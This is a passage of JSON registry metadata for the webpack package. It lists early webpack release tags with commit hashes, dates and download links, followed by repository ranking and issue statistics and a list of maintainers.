r.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-31T06:38:33.784Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":31.979943940947386,"dependent_packages_count":48.85985838769028,"stargazers_count":0.272068988348786,"forks_count":0.6354295620210954,"average":20.43682521975189},"purl":"pkg:maven/org.webjars.npm/github-com-webpack-webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.webjars.npm:github-com-webpack-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.webjars.npm:github-com-webpack-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.webjars.npm:github-com-webpack-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T17:00:08.374Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"Sc